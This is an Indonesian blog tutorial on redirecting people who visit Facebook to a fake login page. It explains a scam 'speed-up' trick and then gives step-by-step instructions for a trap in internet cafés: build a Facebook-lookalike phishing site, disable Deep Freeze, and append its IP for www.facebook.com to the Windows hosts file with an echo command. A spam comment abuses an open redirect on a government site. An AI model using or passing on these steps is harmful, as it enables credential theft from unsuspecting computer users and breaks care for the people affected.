Tutorial Mengalihkan Korban yang Mengakses FB ke Website Fakelogin

WARNING : (gunakan sebijak mungkin gan,ini hanya semata-mata hanya untuk berbagi ilmu)
OK langsung aja kita mulai...... ini adalah cara mengalihkan korban yang mengakses http://www.facebook.com ke alamat website fake login kita

mempercepat koneksi facebook
agan pecinta facebook??tentu saja bermain FB sangat menyenangkan lalu apa yang terjadi ketika agan bermain FB koneksi menjadi lemot??
tentu sangat menyebalkan bukan,terus apa dunk solusi agar saat kita bermain FB tidak lemot??bermain FB menjadi lambat karena web browser kita mengirim data facebook ke ip adress 69.63.184.31 dan karena banyak yang user menggunakan/mengirim data ke 69.63.184.31 tentu akan semakin lambat juga lah koneksi agan.......
Tenang,hal ini bisa agan akali dengan cara mengganti ip addres agar web browser kita tidak rebutan dengan user FB lain..lalu bagaimana cara menggantinya??
buka CMD ( start -run -cmd) kemudian di cmd ketik

ECHO 91.197.130.19 WW W.FACEBOOK.COM C:\WINDOWS\system32\drivers\etc\hosts

nah sekarang koneksi FB agan akan semakin cepat
udah di baca artikel ya???terus apa yang membuat artikel tersebut di katakan sebagai artikel penipuan??
ini karena si pembuat artikel menyuruh pembaca untuk melakukan perintah :

ECHO 91.197.130.19 WW W.FACEBOOK.COM C:\WINDOWS\system32\drivers\etc\hosts

yang kurang lebih arti nya : jika user mengakses alamat http://www.facebook.com maka akan di alihakan ke 91.197.130.19
terus apa yang salah dengan 91.197.130.19 ??? karena 91.197.130.19 adalah alamat palsu untuk melakukan fakelogin
untuk lebih jelas nya coba ke alamat :
http://www.google.com terus buka new tab kemudian masukan 64.233.181.147
sama kan ...artinya 64.233.181.147 adalah alamat lain dari http://www.google.com .
nah jadi kalo korban memlakukan perintah
ECHO 91.197.130.19 WW W.FACEBOOK.COM C:\WINDOWS\system32\drivers\etc\hosts maka setiap korban mengunjungi alamat http://www.facebook.com
korban akan di alihkan ke 91.197.130.19(fake login punya kita)
udah ngertikan??
sekarang kita menggunakan tehnik ini untuk jebakan di warnet :
1.BUAT website fake login dengan domain terserah
2.bikin tampilan index website menjadi fakelogin facebook
3.kemudian buka cmd ketik PING http://WWW.sitefakelogin.domainkita
4.kemudian akan tampil di cmd kita pinging http://WWW.sitefakelogin.domainkita
[12.09.2343(berbeda2 ip adresanya]
5.catat no ip addres website agan
ok.kalo udah siap semua..sekarang kita menuju warnet
di warnet kita matiin dulu deepfreze ya..terus buka cmd ketik :
echo 12.09.2352 WW W.FACEBOOK.COM C:\WINDOWS\system32\drivers\etc\hosts
nb: 12.09.2352(no ip adres web fake login kita)

nah jadi..kalo ada user make komputer yang udah kita pasang jebakan terus dia mengakses http://www.facebook.com dia akan di alihkan ke website palsu kita
END.

3 komentar:

FREK@

gak bisa bos, kecuali dia punya virtual server kayak apache

Jolie fox

postingannya keren gan

Alexa SEO Link Gov dan Edu

1.BUAT website fake login dengan domain terserah
2.bikin tampilan index website menjadi fakelogin facebook
3.kemudian buka cmd ketik PING http://WWW.sitefakelogin.domainkita
4.kemudian akan tampil di cmd kita pinging http://WWW.sitefakelogin.domainkita

lihat selengkapnya dan sedetailnya di Tutorial Mengalihkan Korban yang Mengakses FB ke Website Fakelogin

http://www.sedonaaz.gov/sedonacms/redirect.aspx?url=http://discjockey.mwb-id.com/

Posting Komentar

Posting Lebih Baru Posting Lama Beranda

Baca Juga :

Loading

select your language

 

Blog Archive

Sms Gratis

Dapatkan Kiriman Artikel Terbaru dari Hatad langsung ke Email anda


Masukkan Email Anda

FOLLOWERS



 

Templates by Hatad | Powered by Blogger